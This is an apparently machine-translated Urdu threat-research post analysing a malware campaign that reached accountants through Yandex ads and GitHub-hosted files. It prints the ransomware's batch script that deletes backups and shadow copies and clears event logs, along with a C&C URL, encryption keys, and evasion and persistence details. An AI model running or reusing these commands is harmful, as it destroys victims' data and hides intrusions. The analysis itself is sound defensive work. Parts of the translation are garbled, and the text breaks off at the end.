سائبر حملے میں اکاؤنٹنٹس کو نشانہ بنانے کے لیے، آپ کام کی دستاویزات کا استعمال کر سکتے ہیں جو وہ آن لائن تلاش کرتے ہیں۔ یہ تقریباً وہی ہے جو پچھلے کچھ مہینوں سے ایک سائبر گروپ کر رہا ہے، جو معلوم پچھلے دروازے تقسیم کر رہا ہے۔ и ، نیز کریپٹو کرنسیوں کو چوری کرنے کے لیے انکرپٹرز اور سافٹ ویئر۔ زیادہ تر اہداف روس میں ہیں۔ حملہ Yandex.Direct پر بدنیتی پر مبنی اشتہار دے کر کیا گیا۔ ممکنہ متاثرین کو ایک ویب سائٹ پر بھیج دیا گیا جہاں ان سے دستاویز کی ٹیمپلیٹ کے بھیس میں ایک بدنیتی پر مبنی فائل ڈاؤن لوڈ کرنے کو کہا گیا۔ Yandex نے ہماری وارننگ کے بعد بدنیتی پر مبنی اشتہارات کو ہٹا دیا۔
بوہٹریپ کا سورس کوڈ ماضی میں آن لائن لیک ہو چکا ہے تاکہ کوئی بھی اسے استعمال کر سکے۔ ہمارے پاس RTM کوڈ کی دستیابی سے متعلق کوئی معلومات نہیں ہے۔
اس پوسٹ میں ہم آپ کو بتائیں گے کہ حملہ آوروں نے Yandex.Direct کا استعمال کرتے ہوئے میلویئر کو کیسے تقسیم کیا اور اسے GitHub پر ہوسٹ کیا۔ پوسٹ کا اختتام میلویئر کے تکنیکی تجزیہ کے ساتھ ہوگا۔
Buhtrap اور RTM دوبارہ کاروبار میں آ گئے ہیں۔
پھیلاؤ اور متاثرین کا طریقہ کار
متاثرین کو پہنچائے جانے والے مختلف پے لوڈ ایک مشترکہ پروپیگنڈے کا طریقہ کار رکھتے ہیں۔ حملہ آوروں کے ذریعہ بنائی گئی تمام بدنیتی پر مبنی فائلیں دو مختلف GitHub ذخیروں میں رکھی گئی تھیں۔
عام طور پر، ریپوزٹری میں ایک ڈاؤن لوڈ کے قابل نقصان دہ فائل ہوتی تھی، جو اکثر تبدیل ہوتی رہتی ہے۔ چونکہ GitHub آپ کو ایک مخزن میں ہونے والی تبدیلیوں کی تاریخ دیکھنے کی اجازت دیتا ہے، اس لیے ہم دیکھ سکتے ہیں کہ ایک مخصوص مدت کے دوران کیا مالویئر تقسیم کیا گیا تھا۔ متاثرہ کو نقصان دہ فائل ڈاؤن لوڈ کرنے کے لیے قائل کرنے کے لیے، ویب سائٹ blanki-shabloni24[.]ru، جو اوپر دی گئی تصویر میں دکھائی گئی ہے، استعمال کی گئی۔
سائٹ کا ڈیزائن اور بدنیتی پر مبنی فائلوں کے تمام نام ایک ہی تصور کی پیروی کرتے ہیں - فارم، ٹیمپلیٹس، معاہدے، نمونے وغیرہ۔ اس بات کو مدنظر رکھتے ہوئے کہ ماضی میں اکاؤنٹنٹس پر حملوں میں بوہٹریپ اور آر ٹی ایم سافٹ ویئر پہلے ہی استعمال ہو چکے ہیں، ہم نے فرض کیا کہ نئی مہم میں حکمت عملی ایک ہی ہے۔ صرف سوال یہ ہے کہ متاثرہ شخص حملہ آوروں کی ویب سائٹ تک کیسے پہنچا۔
انفیکشن
اس سائٹ پر ختم ہونے والے کم از کم کئی ممکنہ متاثرین بدنیتی پر مبنی اشتہارات کی طرف راغب ہوئے۔ ذیل میں ایک مثال یو آر ایل ہے:
https://blanki-shabloni24.ru/?utm_source=yandex&utm_medium=banner&utm_campaign=cid|{blanki_rsya}|context&utm_content=gid|3590756360|aid|6683792549|15114654950_&utm_term=скачать бланк счета&pm_source=bb.f2.kz&pm_block=none&pm_position=0&yclid=1029648968001296456
جیسا کہ آپ لنک سے دیکھ سکتے ہیں، بینر جائز اکاؤنٹنگ فورم bb.f2[.]kz پر پوسٹ کیا گیا تھا۔ یہ نوٹ کرنا ضروری ہے کہ بینرز مختلف سائٹس پر نمودار ہوئے، سبھی کی ایک ہی مہم آئی ڈی (blanki_rsya) تھی، اور زیادہ تر اکاؤنٹنگ یا قانونی معاونت کی خدمات سے متعلق تھی۔ یو آر ایل ظاہر کرتا ہے کہ ممکنہ شکار نے "انوائس فارم ڈاؤن لوڈ کریں" کی درخواست کا استعمال کیا، جو ٹارگٹ حملوں کے بارے میں ہمارے مفروضے کی حمایت کرتا ہے۔ ذیل میں وہ سائٹس ہیں جہاں بینرز نمودار ہوئے اور متعلقہ تلاش کے سوالات۔
- انوائس فارم ڈاؤن لوڈ کریں – bb.f2[.]kz
- نمونہ معاہدہ - Ipopen[.]ru
- درخواست کی شکایت کا نمونہ - 77metrov[.]ru
- معاہدہ فارم - خالی-ڈوگوور-کپلی-پروڈازی[.]ru
- نمونہ عدالت کی درخواست - zen.yandex[.]ru
- نمونہ شکایت - yurday[.]ru
- نمونہ کنٹریکٹ فارم – ریگفورم[.]ru
- معاہدہ فارم - معاون[.]ru
- نمونہ اپارٹمنٹ معاہدہ - napravah[.]com
- قانونی معاہدوں کے نمونے - avito[.]ru
blanki-shabloni24[.]ru سائٹ کو ایک سادہ بصری تشخیص پاس کرنے کے لیے ترتیب دیا گیا ہو گا۔ عام طور پر، ایک اشتہار جو GitHub کے لنک کے ساتھ پیشہ ورانہ نظر آنے والی سائٹ کی طرف اشارہ کرتا ہے، ایسا نہیں لگتا کہ کچھ واضح طور پر برا ہے۔ اس کے علاوہ، حملہ آوروں نے مہم کے دوران، ممکنہ طور پر محدود مدت کے لیے مخزن میں بدنیتی پر مبنی فائلیں اپ لوڈ کیں۔ زیادہ تر وقت، GitHub ذخیرہ میں ایک خالی زپ آرکائیو یا ایک خالی EXE فائل ہوتی ہے۔ اس طرح، حملہ آور Yandex.Direct کے ذریعے ان سائٹس پر اشتہارات تقسیم کر سکتے تھے جن کا زیادہ تر ممکنہ طور پر مخصوص تلاش کے سوالات کے جواب میں آنے والے اکاؤنٹنٹس نے دورہ کیا تھا۔
اگلا، آئیے اس طرح تقسیم کیے گئے مختلف پے لوڈز کو دیکھتے ہیں۔
پے لوڈ تجزیہ
تقسیم کی تاریخ
بدنیتی پر مبنی مہم اکتوبر 2018 کے آخر میں شروع ہوئی اور لکھنے کے وقت تک فعال ہے۔ چونکہ پورا ذخیرہ GitHub پر عوامی طور پر دستیاب تھا، اس لیے ہم نے چھ مختلف میلویئر خاندانوں کی تقسیم کی ایک درست ٹائم لائن مرتب کی (ذیل میں تصویر دیکھیں)۔ ہم نے ایک لائن شامل کی ہے جس میں دکھایا گیا ہے کہ بینر کا لنک کب دریافت ہوا، جیسا کہ ESET ٹیلی میٹری کے ذریعے ماپا گیا ہے، گٹ ہسٹری کے ساتھ موازنہ کرنے کے لیے۔ جیسا کہ آپ دیکھ سکتے ہیں، یہ GitHub پر پے لوڈ کی دستیابی کے ساتھ اچھی طرح سے تعلق رکھتا ہے۔ فروری کے آخر میں پائے جانے والے تضاد کی وضاحت اس حقیقت سے کی جا سکتی ہے کہ ہمارے پاس تبدیلی کی تاریخ کا حصہ نہیں تھا کیونکہ اس سے پہلے کہ ہم اسے مکمل حاصل کر پاتے GitHub سے ذخیرہ ہٹا دیا گیا تھا۔
تصویر 1. میلویئر کی تقسیم کی تاریخ۔
کوڈ پر دستخط کرنے والے سرٹیفکیٹ
مہم میں متعدد سرٹیفکیٹس کا استعمال کیا گیا۔ کچھ پر ایک سے زیادہ میلویئر فیملی نے دستخط کیے تھے، جو مزید بتاتا ہے کہ مختلف نمونے ایک ہی مہم سے تعلق رکھتے تھے۔ نجی کلید کی دستیابی کے باوجود، آپریٹرز نے منظم طریقے سے بائنریز پر دستخط نہیں کیے اور تمام نمونوں کے لیے کلید کا استعمال نہیں کیا۔ فروری 2019 کے آخر میں، حملہ آوروں نے گوگل کی ملکیت والے سرٹیفکیٹ کا استعمال کرتے ہوئے غلط دستخط بنانا شروع کیے جس کے لیے ان کے پاس نجی کلید نہیں تھی۔
مہم میں شامل تمام سرٹیفکیٹس اور میلویئر فیملیز جن پر وہ دستخط کرتے ہیں ذیل کے جدول میں درج ہیں۔
ہم نے ان کوڈ پر دستخط کرنے والے سرٹیفکیٹس کو دوسرے میلویئر فیملیز کے ساتھ روابط قائم کرنے کے لیے بھی استعمال کیا ہے۔ زیادہ تر سرٹیفکیٹس کے لیے، ہمیں ایسے نمونے نہیں ملے جو GitHub کے ذخیرے کے ذریعے تقسیم نہیں کیے گئے تھے۔ تاہم، TOV "MARIA" سرٹیفکیٹ بوٹ نیٹ سے تعلق رکھنے والے میلویئر پر دستخط کرنے کے لیے استعمال کیا گیا تھا۔ ، ایڈویئر اور کان کنوں. اس بات کا امکان نہیں ہے کہ اس میلویئر کا اس مہم سے کوئی تعلق ہو۔ زیادہ امکان ہے، سرٹیفکیٹ ڈارک نیٹ پر خریدا گیا تھا۔
Win32/Filecoder.Buhtrap
پہلا جزو جس نے ہماری توجہ حاصل کی وہ نیا دریافت شدہ Win32/Filecoder.Buhtrap تھا۔ یہ ڈیلفی بائنری فائل ہے جو کبھی کبھی پیک کی جاتی ہے۔ یہ بنیادی طور پر فروری-مارچ 2019 میں تقسیم کیا گیا تھا۔ یہ رینسم ویئر پروگرام کے مطابق برتاؤ کرتا ہے - یہ مقامی ڈرائیوز اور نیٹ ورک فولڈرز کو تلاش کرتا ہے اور پتہ چلنے والی فائلوں کو انکرپٹ کرتا ہے۔ سمجھوتہ کرنے کے لیے اسے انٹرنیٹ کنکشن کی ضرورت نہیں ہے کیونکہ یہ انکرپشن کیز بھیجنے کے لیے سرور سے رابطہ نہیں کرتا ہے۔ اس کے بجائے، یہ تاوان کے پیغام کے آخر میں ایک "ٹوکن" کا اضافہ کرتا ہے، اور آپریٹرز سے رابطہ کرنے کے لیے ای میل یا بٹ میسج استعمال کرنے کی تجویز کرتا ہے۔
زیادہ سے زیادہ حساس وسائل کو خفیہ کرنے کے لیے، Filecoder.Buhtrap ایک دھاگہ چلاتا ہے جو کلیدی سافٹ ویئر کو بند کرنے کے لیے ڈیزائن کیا گیا ہے جس میں اوپن فائل ہینڈلرز ہو سکتے ہیں جن میں قیمتی معلومات موجود ہیں جو کہ خفیہ کاری میں مداخلت کر سکتی ہیں۔ ہدف کے عمل بنیادی طور پر ڈیٹا بیس مینجمنٹ سسٹم (DBMS) ہیں۔ اس کے علاوہ، Filecoder.Buhtrap ڈیٹا کی وصولی کو مشکل بنانے کے لیے لاگ فائلوں اور بیک اپ کو حذف کر دیتا ہے۔ ایسا کرنے کے لیے نیچے دی گئی بیچ اسکرپٹ کو چلائیں۔
bcdedit /set {default} bootstatuspolicy ignoreallfailures
bcdedit /set {default} recoveryenabled no
wbadmin delete catalog -quiet
wbadmin delete systemstatebackup
wbadmin delete systemstatebackup -keepversions:0
wbadmin delete backup
wmic shadowcopy delete
vssadmin delete shadows /all /quiet
reg delete "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientDefault" /va /f
reg delete "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientServers" /f
reg add "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientServers"
attrib "%userprofile%documentsDefault.rdp" -s -h
del "%userprofile%documentsDefault.rdp"
wevtutil.exe clear-log Application
wevtutil.exe clear-log Security
wevtutil.exe clear-log System
sc config eventlog start=disabled
Filecoder.Buhtrap ایک جائز آن لائن IP Logger سروس کا استعمال کرتا ہے جو ویب سائٹ دیکھنے والوں کے بارے میں معلومات جمع کرنے کے لیے ڈیزائن کیا گیا ہے۔ اس کا مقصد ransomware کے متاثرین کو ٹریک کرنا ہے، جو کہ کمانڈ لائن کی ذمہ داری ہے:
mshta.exe "javascript:document.write('');"
انکرپشن کے لیے فائلیں منتخب کی جاتی ہیں اگر وہ تین اخراج کی فہرستوں سے مماثل نہیں ہیں۔ سب سے پہلے، درج ذیل ایکسٹینشنز والی فائلیں انکرپٹڈ نہیں ہیں: .com, .cmd, .cpl, .dll, .exe, .hta, .lnk, .msc, .msi, .msp, .pif, .scr, .sys اور .چمگادڑ. دوم، وہ تمام فائلیں جن کے لیے مکمل پاتھ میں نیچے دی گئی فہرست سے ڈائرکٹری سٹرنگز شامل ہیں خارج کردی گئی ہیں۔
.{ED7BA470-8E54-465E-825C-99712043E01C}
tor browser
opera
opera software
mozilla
mozilla firefox
internet explorer
googlechrome
google
boot
application data
apple computersafari
appdata
all users
:windows
:system volume information
:nvidia
:intel
تیسرا، مخصوص فائل کے ناموں کو بھی انکرپشن سے خارج کر دیا گیا ہے، ان میں تاوان کے پیغام کی فائل کا نام بھی شامل ہے۔ فہرست ذیل میں پیش کی گئی ہے۔ ظاہر ہے، ان تمام مستثنیات کا مقصد مشین کو چلتا رکھنا ہے، لیکن کم سے کم سڑک کی اہلیت کے ساتھ۔
boot.ini
bootfont.bin
bootsect.bak
desktop.ini
iconcache.db
ntdetect.com
ntldr
ntuser.dat
ntuser.dat.log
ntuser.ini
thumbs.db
winupas.exe
your files are now encrypted.txt
windows update assistant.lnk
master.exe
unlock.exe
unlocker.exe
فائل انکرپشن سکیم
ایک بار عمل میں آنے کے بعد، میلویئر ایک 512 بٹ RSA کلیدی جوڑا تیار کرتا ہے۔ اس کے بعد پرائیویٹ ایکسپوننٹ (d) اور ماڈیولس (n) کو ہارڈ کوڈڈ 2048-بٹ پبلک کلید (عوامی ایکسپوننٹ اور ماڈیولس)، zlib-packed، اور base64 انکوڈ کے ساتھ انکرپٹ کیا جاتا ہے۔ اس کے لیے ذمہ دار کوڈ تصویر 2 میں دکھایا گیا ہے۔
شکل 2. 512-بٹ RSA کلیدی جوڑی کی تیاری کے عمل کے ہیکس رے کے اخراج کا نتیجہ۔
ذیل میں ایک تخلیق کردہ نجی کلید کے ساتھ سادہ متن کی ایک مثال ہے، جو کہ تاوان کے پیغام کے ساتھ منسلک ایک ٹوکن ہے۔
DF9228F4F3CA93314B7EE4BEFC440030665D5A2318111CC3FE91A43D781E3F91BD2F6383E4A0B4F503916D75C9C576D5C2F2F073ADD4B237F7A2B3BF129AE2F399197ECC0DD002D5E60C20CE3780AB9D1FE61A47D9735036907E3F0CF8BE09E3E7646F8388AAC75FF6A4F60E7F4C2F697BF6E47B2DBCDEC156EAD854CADE53A239
حملہ آوروں کی عوامی کلید ذیل میں دی گئی ہے۔
e = 0x72F750D7A93C2C88BFC87AD4FC0BF4CB45E3C55701FA03D3E75162EB5A97FDA7ACF8871B220A33BEDA546815A9AD9AA0C2F375686F5009C657BB3DF35145126C71E3C2EADF14201C8331699FD0592C957698916FA9FEA8F0B120E4296193AD7F3F3531206608E2A8F997307EE7D14A9326B77F1B34C4F1469B51665757AFD38E88F758B9EA1B95406E72B69172A7253F1DFAA0FA02B53A2CC3A7F0D708D1A8CAA30D954C1FEAB10AD089EFB041DD016DCAAE05847B550861E5CACC6A59B112277B60AC0E4E5D0EA89A5127E93C2182F77FDA16356F4EF5B7B4010BCCE1B1331FCABFFD808D7DAA86EA71DFD36D7E701BD0050235BD4D3F20A97AAEF301E785005
n = 0x212ED167BAC2AEFF7C3FA76064B56240C5530A63AB098C9B9FA2DE18AF9F4E1962B467ABE2302C818860F9215E922FC2E0E28C0946A0FC746557722EBB35DF432481AC7D5DDF69468AF1E952465E61DDD06CDB3D924345A8833A7BC7D5D9B005585FE95856F5C44EA917306415B767B684CC85E7359C23231C1DCBBE714711C08848BEB06BD287781AEB53D94B7983EC9FC338D4320129EA4F568C410317895860D5A85438B2DA6BB3BAAE9D9CE65BCEA6760291D74035775F28DF4E6AB1A748F78C68AB07EA166A7309090202BB3F8FBFC19E44AC0B4D3D0A37C8AA5FA90221DA7DB178F89233E532FF90B55122B53AB821E1A3DB0F02524429DEB294B3A4EDD
فائلوں کو 128 بٹ کلید کے ساتھ AES-256-CBC کا استعمال کرتے ہوئے انکرپٹ کیا گیا ہے۔ ہر انکرپٹڈ فائل کے لیے، ایک نئی کلید اور ایک نیا ابتدائی ویکٹر تیار کیا جاتا ہے۔ کلیدی معلومات کو انکرپٹڈ فائل کے آخر میں شامل کیا جاتا ہے۔ آئیے انکرپٹڈ فائل کے فارمیٹ پر غور کریں۔
خفیہ کردہ فائلوں میں درج ذیل ہیڈر ہوتے ہیں:
VEGA میجک ویلیو کے اضافے کے ساتھ سورس فائل ڈیٹا کو پہلے 0x5000 بائٹس میں انکرپٹ کیا گیا ہے۔ تمام ڈکرپشن معلومات درج ذیل ڈھانچے والی فائل کے ساتھ منسلک ہیں۔
- فائل سائز مارکر میں ایک نشان ہوتا ہے جو اس بات کی نشاندہی کرتا ہے کہ فائل سائز میں 0x5000 بائٹس سے بڑی ہے
— AES کلیدی بلاب = ZlibCompress(RSAEncrypt(AES کلید + IV، تیار کردہ RSA کلیدی جوڑے کی عوامی کلید))
- RSA کلید بلاب = ZlibCompress(RSAEncrypt (جنریٹڈ RSA نجی کلید، ہارڈ کوڈڈ RSA پبلک کی))
Win32/ClipBanker
Win32/ClipBanker ایک ایسا جزو ہے جو اکتوبر کے آخر سے دسمبر 2018 کے اوائل تک وقفے وقفے سے تقسیم کیا گیا۔ اس کا کردار کلپ بورڈ کے مواد کی نگرانی کرنا ہے، یہ cryptocurrency بٹوے کے پتے تلاش کرتا ہے۔ ٹارگٹ والیٹ ایڈریس کا تعین کرنے کے بعد، ClipBanker اسے ایک ایسے ایڈریس سے بدل دیتا ہے جس کے بارے میں خیال کیا جاتا ہے کہ آپریٹرز کا ہے۔ ہم نے جن نمونوں کی جانچ کی وہ نہ تو باکسڈ تھے اور نہ ہی مبہم تھے۔ رویے کو ماسک کرنے کے لیے استعمال ہونے والا واحد طریقہ کار سٹرنگ انکرپشن ہے۔ آپریٹر والیٹ کے پتے RC4 کا استعمال کرتے ہوئے انکرپٹ کیے جاتے ہیں۔ ٹارگٹ کریپٹو کرنسیاں بٹ کوائن، بٹ کوائن کیش، ڈوج کوائن، ایتھریم اور ریپل ہیں۔
اس مدت کے دوران جب میلویئر حملہ آوروں کے بٹ کوائن بٹوے میں پھیل رہا تھا، VTS کو ایک چھوٹی سی رقم بھیجی گئی، جس سے مہم کی کامیابی پر شک پیدا ہوا۔ مزید برآں، اس بات کا کوئی ثبوت نہیں ہے کہ یہ لین دین بالکل بھی ClipBanker سے متعلق تھے۔
Win32/RTM
Win32/RTM جزو مارچ 2019 کے اوائل میں کئی دنوں تک تقسیم کیا گیا تھا۔ RTM ایک ٹروجن بینکر ہے جسے Delphi میں لکھا گیا ہے، جس کا مقصد ریموٹ بینکنگ سسٹم ہے۔ 2017 میں، ESET محققین نے شائع کیا اس پروگرام کی، تفصیل اب بھی متعلقہ ہے۔ جنوری 2019 میں، پالو آلٹو نیٹ ورکس نے بھی ریلیز کیا۔ .
بوہٹریپ لوڈر
کچھ عرصے سے، گٹ ہب پر ایک ڈاؤنلوڈر دستیاب تھا جو پچھلے بوہٹریپ ٹولز سے ملتا جلتا نہیں تھا۔ وہ مڑتا ہے۔ https://94.100.18[.]67/RSS.php?<some_id> اگلے مرحلے کو حاصل کرنے اور اسے براہ راست میموری میں لوڈ کرنے کے لیے۔ ہم دوسرے مرحلے کے کوڈ کے دو رویوں میں فرق کر سکتے ہیں۔ پہلے یو آر ایل میں، RSS.php نے Buhtrap بیک ڈور کو براہ راست پاس کیا - یہ بیک ڈور اس سے بہت ملتا جلتا ہے جو سورس کوڈ کے لیک ہونے کے بعد دستیاب ہے۔
دلچسپ بات یہ ہے کہ ہم بوہٹراپ بیک ڈور کے ساتھ کئی مہمات دیکھتے ہیں، اور وہ مبینہ طور پر مختلف آپریٹرز کے ذریعے چلائی جاتی ہیں۔ اس معاملے میں، بنیادی فرق یہ ہے کہ بیک ڈور براہ راست میموری میں لوڈ ہوتا ہے اور DLL تعیناتی کے عمل کے ساتھ معمول کی اسکیم استعمال نہیں کرتا جس کے بارے میں ہم نے بات کی تھی۔ . اس کے علاوہ، آپریٹرز نے نیٹ ورک ٹریفک کو C&C سرور پر خفیہ کرنے کے لیے استعمال ہونے والی RC4 کلید کو تبدیل کر دیا۔ زیادہ تر مہموں میں جو ہم نے دیکھی ہیں، آپریٹرز نے اس کلید کو تبدیل کرنے کی زحمت نہیں کی۔
دوسرا، زیادہ پیچیدہ رویہ یہ تھا کہ RSS.php یو آر ایل دوسرے لوڈر کو منتقل کیا گیا تھا۔ اس نے کچھ الجھنوں کو لاگو کیا، جیسے متحرک درآمدی میز کو دوبارہ بنانا۔ بوٹ لوڈر کا مقصد C&C سرور سے رابطہ کرنا ہے۔ [.]com/api/F27F84EDA4D13B15/2، لاگ بھیجیں اور جواب کا انتظار کریں۔ یہ جواب کو بلاب کی طرح پروسیس کرتا ہے، اسے میموری میں لوڈ کرتا ہے اور اس پر عمل درآمد کرتا ہے۔ جو پے لوڈ ہم نے اس لوڈر کو چلاتے ہوئے دیکھا وہی بوہٹریپ بیک ڈور تھا، لیکن اس کے دوسرے اجزاء بھی ہو سکتے ہیں۔
Android/Spy.Banker
دلچسپ بات یہ ہے کہ گٹ ہب ریپوزٹری میں اینڈرائیڈ کے لیے ایک جزو بھی پایا گیا۔ وہ صرف ایک دن کے لیے مین برانچ میں تھا - 1 نومبر 2018۔ GitHub پر پوسٹ ہونے کے علاوہ، ESET ٹیلی میٹری کو اس میلویئر کے تقسیم ہونے کا کوئی ثبوت نہیں ملا۔
جزو کی میزبانی ایک اینڈرائیڈ ایپلیکیشن پیکج (APK) کے طور پر کی گئی تھی۔ یہ بہت زیادہ الجھا ہوا ہے۔ نقصان دہ سلوک APK میں واقع ایک انکرپٹڈ JAR میں چھپا ہوا ہے۔ یہ اس کلید کا استعمال کرتے ہوئے RC4 کے ساتھ خفیہ کردہ ہے:
key = [
0x87, 0xd6, 0x2e, 0x66, 0xc5, 0x8a, 0x26, 0x00, 0x72, 0x86, 0x72, 0x6f,
0x0c, 0xc1, 0xdb, 0xcb, 0x14, 0xd2, 0xa8, 0x19, 0xeb, 0x85, 0x68, 0xe1,
0x2f, 0xad, 0xbe, 0xe3, 0xb9, 0x60, 0x9b, 0xb9, 0xf4, 0xa0, 0xa2, 0x8b, 0x96
]
اسی کلید اور الگورتھم کو تاروں کو خفیہ کرنے کے لیے استعمال کیا جاتا ہے۔ JAR میں واقع ہے APK_ROOT + image/files. فائل کے پہلے 4 بائٹس میں انکرپٹڈ JAR کی لمبائی ہوتی ہے، جو لینتھ فیلڈ کے فوراً بعد شروع ہوتی ہے۔
فائل کو ڈکرپٹ کرنے کے بعد، ہم نے دریافت کیا کہ یہ Anubis تھا - پہلے اینڈرائیڈ کے لیے بینکر۔ میلویئر میں درج ذیل خصوصیات ہیں:
- مائکروفون ریکارڈنگ
- اسکرین شاٹس لے رہے ہیں۔
- GPS کوآرڈینیٹ حاصل کرنا
- keylogger
- ڈیوائس ڈیٹا انکرپشن اور تاوان کا مطالبہ
- سپیم بھیجنا
دلچسپ بات یہ ہے کہ بینکر نے ایک اور C&C سرور حاصل کرنے کے لیے ٹوئٹر کو بیک اپ کمیونیکیشن چینل کے طور پر استعمال کیا۔ ہم نے جس نمونے کا تجزیہ کیا اس میں @JonesTrader اکاؤنٹ استعمال کیا گیا، لیکن تجزیہ کے وقت یہ پہلے ہی بلاک تھا۔
بینکر اینڈرائیڈ ڈیوائس پر ٹارگٹ ایپلی کیشنز کی فہرست پر مشتمل ہے۔ یہ سوفوس کے مطالعہ میں حاصل کردہ فہرست سے زیادہ طویل ہے۔ اس فہرست میں بہت سی بینکنگ ایپلی کیشنز، آن لائن شاپنگ پروگرامز جیسے Amazon اور eBay، اور cryptocurrency سروسز شامل ہیں۔
MSIL/ClipBanker.IH
اس مہم کے حصے کے طور پر تقسیم کیا گیا آخری جزو .NET Windows قابل عمل تھا، جو مارچ 2019 میں ظاہر ہوا۔ مطالعہ کیے گئے زیادہ تر ورژن ConfuserEx v1.0.0 کے ساتھ پیک کیے گئے تھے۔ ClipBanker کی طرح، یہ جزو کلپ بورڈ استعمال کرتا ہے۔ اس کا مقصد cryptocurrencies کی ایک وسیع رینج کے ساتھ ساتھ Steam پر پیشکش بھی ہے۔ مزید برآں، وہ بٹ کوائن کی نجی WIF کلید کو چرانے کے لیے IP Logger سروس استعمال کرتا ہے۔
تحفظ کے طریقہ کار
ConfuserEx ڈیبگنگ، ڈمپنگ اور چھیڑ چھاڑ کو روکنے میں جو فوائد فراہم کرتا ہے اس کے علاوہ، جزو میں اینٹی وائرس مصنوعات اور ورچوئل مشینوں کا پتہ لگانے کی صلاحیت بھی شامل ہے۔
اس بات کی تصدیق کرنے کے لیے کہ یہ ورچوئل مشین میں چلتا ہے، میلویئر BIOS معلومات کی درخواست کرنے کے لیے بلٹ ان Windows WMI کمانڈ لائن (WMIC) کا استعمال کرتا ہے، یعنی:
wmic bios
پھر پروگرام کمانڈ آؤٹ پٹ کو پارس کرتا ہے اور مطلوبہ الفاظ کی تلاش کرتا ہے: VBOX، VirtualBox، XEN، qemu، bochs، VM۔
اینٹی وائرس پروڈکٹس کا پتہ لگانے کے لیے، میلویئر ونڈوز سیکیورٹی سینٹر کو ونڈوز مینجمنٹ انسٹرومینٹیشن (WMI) کی درخواست بھیجتا ہے۔ ManagementObjectSearcher API جیسا کہ ذیل میں دکھایا گیا ہے۔ بیس 64 سے ڈی کوڈ کرنے کے بعد کال اس طرح دکھائی دیتی ہے:
ManagementObjectSearcher('rootSecurityCenter2', 'SELECT * FROM AntivirusProduct')
شکل 3۔ اینٹی وائرس مصنوعات کی شناخت کا عمل۔
اس کے علاوہ، میلویئر چیک کرتا ہے کہ آیا ، کلپ بورڈ کے حملوں سے بچانے کے لیے ایک ٹول اور، اگر چل رہا ہے، تو اس عمل میں تمام تھریڈز کو معطل کر دیتا ہے، اس طرح تحفظ کو غیر فعال کر دیتا ہے۔
استقامت
میلویئر کا جس ورژن کا ہم نے مطالعہ کیا ہے وہ خود ہی کاپی کرتا ہے۔ %APPDATA%googleupdater.exe اور گوگل ڈائرکٹری کے لیے "پوشیدہ" وصف سیٹ کرتا ہے۔ پھر وہ قدر بدلتی ہے۔ SoftwareMicrosoftWindows NTCurrentVersionWinlogonshell ونڈوز رجسٹری میں اور راستہ شامل کرتا ہے۔ updater.exe. اس طرح، صارف کے لاگ ان ہونے پر ہر بار میلویئر کو پھانسی دی جائے گی۔
بدنیتی پر مبنی رویہ
ClipBanker کی طرح، میلویئر کلپ بورڈ کے مواد کی نگرانی کرتا ہے اور کریپٹو کرنسی والیٹ کے پتے تلاش کرتا ہے، اور جب مل جائے تو اسے آپریٹر کے پتے میں سے کسی ایک سے بدل دیتا ہے۔ ذیل میں ٹارگٹ ایڈریسز کی ایک فہرست دی گئی ہے جس کی بنیاد کوڈ میں موجود ہے۔
BTC_P2PKH, BTC_P2SH, BTC_BECH32, BCH_P2PKH_CashAddr, BTC_GOLD, LTC_P2PKH, LTC_BECH32, LTC_P2SH_M, ETH_ERC20, XMR, DCR, XRP, DOGE, DASH, ZEC_T_ADDR, ZEC_Z_ADDR, STELLAR, NEO, ADA, IOTA, NANO_1, NANO_3, BANANO_1, BANANO_3, STRATIS, NIOBIO, LISK, QTUM, WMZ, WMX, WME, VERTCOIN, TRON, TEZOS, QIWI_ID, YANDEX_ID, NAMECOIN, B58_PRIVATEKEY, STEAM_URL
ہر قسم کے پتے کے لیے ایک متعلقہ ریگولر ایکسپریشن ہوتا ہے۔ STEAM_URL قدر کا استعمال سٹیم سسٹم پر حملہ کرنے کے لیے کیا جاتا ہے، جیسا کہ ریگولر ایکسپریشن سے دیکھا جا سکتا ہے جو بفر میں بیان کرنے کے لیے استعمال ہوتا ہے:
b(https://|http://|)steamcommunity.com/tradeoffer/new/?partner=[0-9]+&token=[a-zA-Z0-9]+b
اخراج چینل
بفر میں پتوں کو تبدیل کرنے کے علاوہ، میلویئر Bitcoin، Bitcoin Core اور Electrum Bitcoin والیٹس کی نجی WIF کلیدوں کو نشانہ بناتا ہے۔ پروگرام WIF نجی کلید حاصل کرنے کے لیے plogger.org کو ایک ایکسفلٹریشن چینل کے طور پر استعمال کرتا ہے۔ ایسا کرنے کے لیے، آپریٹرز پرائیویٹ کلیدی ڈیٹا کو User-Agent HTTP ہیڈر میں شامل کرتے ہیں، جیسا کہ ذیل میں دکھایا گیا ہے۔
شکل 4. آؤٹ پٹ ڈیٹا کے ساتھ آئی پی لاگر کنسول۔
آپریٹرز نے iplogger.org کو بٹوے نکالنے کے لیے استعمال نہیں کیا۔ فیلڈ میں 255 حروف کی حد کی وجہ سے انہوں نے شاید ایک مختلف طریقہ کا سہارا لیا۔ User-AgentIP Logger ویب انٹرفیس میں ظاہر ہوتا ہے۔ ہم نے جن نمونوں کا مطالعہ کیا ان میں، دوسرے آؤٹ پٹ سرور کو ماحولیاتی متغیر میں محفوظ کیا گیا تھا۔ DiscordWebHook. حیرت انگیز طور پر، یہ ماحولیاتی متغیر کوڈ میں کہیں بھی تفویض نہیں کیا گیا ہے۔ اس سے پتہ چلتا ہے کہ میلویئر ابھی بھی تیار ہو رہا ہے اور متغیر کو آپریٹر کی ٹیسٹ مشین کو تفویض کیا گیا ہے۔
ایک اور نشانی ہے کہ پروگرام ترقی میں ہے۔ بائنری فائل میں دو iplogger.org URLs شامل ہیں، اور جب ڈیٹا نکالا جاتا ہے تو دونوں سے استفسار کیا جاتا ہے۔ ان یو آر ایل میں سے ایک کی درخواست میں، ریفرر فیلڈ میں قدر "DEV /" سے پہلے ہوتی ہے۔ ہمیں ایک ایسا ورژن بھی ملا جو ConfuserEx کا استعمال کرتے ہوئے پیک نہیں کیا گیا تھا، اس URL کے وصول کنندہ کا نام DevFeedbackUrl ہے۔ ماحولیاتی متغیر نام کی بنیاد پر، ہمیں یقین ہے کہ آپریٹرز کرپٹو کرنسی والیٹس چوری کرنے کے لیے جائز سروس Discord اور اس کے ویب انٹرسیپشن سسٹم کو استعمال کرنے کا منصوبہ بنا رہے ہیں۔
حاصل يہ ہوا
